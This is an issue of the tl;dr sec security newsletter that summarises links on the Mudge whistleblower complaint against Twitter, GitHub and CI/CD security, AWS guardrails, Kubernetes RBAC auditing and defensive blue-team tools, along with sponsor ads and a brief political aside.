- tl;dr sec
- [tl;dr sec] #147 - Twitter Whistleblower, CI/CD Security, How to Think About Endpoint Security
[tl;dr sec] #147 - Twitter Whistleblower, CI/CD Security, How to Think About Endpoint Security
Mudge's accusations of Twitter's security posture, identity management risks in GitHub orgs, comparing 6 CI providers and examining GH workflows at scale, Ryan McGeehan offers valuable context on how to think of Mudge's Twitter endpoint comments and thinking about endpoint security at your company.
I hope you’ve been doing well!
When someone keeps asking you for incident response or status updates in general, feel free to share this.
Last week I messed up the following link, apologies: RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise (and slides).
It was fixed quickly on the blog after the email was sent, but here it is for your convenience.
📢 Just Released: Q3 2022 State of API Security Report
Do you have visibility into your organization's API attack surface? If you experienced an API security incident last year, you're not alone. 94% of organizations have had API security problems. Industry-leading research from Salt Security examines how companies secure APIs, the challenges they face, and how their API security strategies are evolving. Download the
to benchmark yourself and improve API security for your company.
📜 In this newsletter...
AppSec: Experimental Elixir support in Semgrep, GitHub now supports SSH commit verification, tool to simplify review and management of threat models in documents
Web Security: Client side desync CTF exercise, collection of tools for web hackers, awesome browser security resources
CI/CD: The Consequences of Inadequate Identity Management in your GitHub Organization, academic paper examining GitHub Action workflow security and 5 other CI providers
Cloud Security: Three AWS Lambda guardrails, detecting suspicious activity in your AWS account using decoy resources
Container Security: Small Linux VM ready to run containers for macOS on ARM, auditing Kubernetes RBAC
Blue Team: Tool to deobfuscate Log4Shell payloads, BloodHound but for the blue team, endpoint security: intuition around the Mudge disclosures
Misc: They say all strongment are dumb, Twitter advanced search cheatsheet, how to ask and get a yes
Twitter & Security: Coverage on Mudge's whistleblowing from a number of outlets and perspectives
A tool by Dave Soldera that simplifies the review and management of threat models in documents. threatware is an AWS lambda function (or CLI tool) with methods to help review threat models (e.g. validate formatting, output threat model in a machine-readable languages) and provide a process to manage threat models (e.g. like version control, for threat models). It works directly with threat models as documents in Confluence/Google Docs.
A curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.
The Consequences of Inadequate Identity Management in your GitHub Organization
Cider Security’s Omer Gil and Yaron Avital outline several risks when not using SSO (and SCIM) to authenticate to GitHub.
When inviting users by email address or GitHub user name, they could be using a non corporate email which you have no control over, and/or they could switch to using a private email in the future (which an attacker could compromise).
When users are logging in to GitHub not via SSO, removing them in your IdP will not remove them from your GitHub org- you’ll need to do that separately.
Deactivating a user in the IdP only prevents them from re-authenticating to GitHub’s website- their Personal Access Tokens and SSH keys will continue to work.
Characterizing the Security of Github CI Workflows
Usenix paper that defines four security properties that must hold to secure CI/CD platforms from supply-chain attacks: Admittance Control, Execution Control, Code Control, and Access to Secrets.
They then examine GitHub CI and five other public CI/CD platforms on these properties, and investigate how the security implications of how developers use workflows in GitHub CI.
Finally, they released GWChecker, a GitHub Action YAML auditing tool that looks for plaintext secrets using regex, tags for versioning, non-verified actions or actions not published on the marketplace, and insecure triggers. GWChecker also enforces a pre commit hook that ensures that the files committed are not in .github/workflow to avoid having workflows that commit other workflow-related files to the repository.
Three Guardrails for AWS Lambda
Brian Tarbox describes three guardrails for Lambdas: code signing, decouple deploying from releasing with function versions and aliases, and do code scanning of new PRs using tools like Amazon CodeGuru Reviewer.
How to detect suspicious activity in your AWS account by using private decoy resources
AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome canarytokens.org.
Auditing RBAC - Redux
Rory McCune walks through the challenges of auditing Kubernetes authorization (there are multiple modes: Node, ABAC, webhook, RBAC), complexities around RBAC, and useful tools to assess RBAC rights.
📢 Find and act on sensitive, toxic, and exposed data
Data is the last mile in any breach. For security engineering teams trying to locate sensitive, toxic, and exposed data within hundreds or thousands of accounts, billions of objects, and petabytes of data (sound familiar?), existing tooling doesn't work. You need a new approach. Open Raven is secure, private, and budget-safe data security that just works. Our platform prevents leaks, breaches, and compliance incidents by fully mapping data locations, types, and security posture and applying guardrails. Download the ebook to learn how to classify and protect cloud data at scale.
Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. This tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.
BlueHound: Community Driven Resilience
Zero Networks’s Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.
Endpoint Security: Intuition around the Mudge Disclosures
Great post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.
Politics / Privacy
Our commitment to election integrity
TikTok is rolling out an Election Center with authoritative info in 45 languages as U.S. midterms near.
Though trusting or relying on a Chinese company to not interfere with U.S. politics or attempt to influence public opinion (or rampantly steal IP) is like relying on McDonald’s to advocate for healthy living.
Though maybe Chinese companies are so good at censoring that they’ll actually do a better job at cracking down on misinformation (that doesn’t align with their interests) 🤔
They say all strongmen are dumb
This killed me 😂
Twitter & Security
Phew, quite some 🌶️ takes and infosec (and tech in general) drama this week.
Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies
Peter Zatko (Mudge) filed a whistleblower complaint about Twitter, claiming things like: executive leadership is purposefully ignorant around the number of bots, there’s been a serial underinvestment in security, there are potential foreign agents on staff, and more.
See also his interview with Donie O’Sullivan.
Twitter CEO calls Mudge Zatko’s whistleblower report a ‘false narrative’
And that Mudge’s claims lack “important context.”
84 page PDF of Mudge’s whistleblower document
A redacted version of what was sent to the SEC, FTC, and DOJ.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!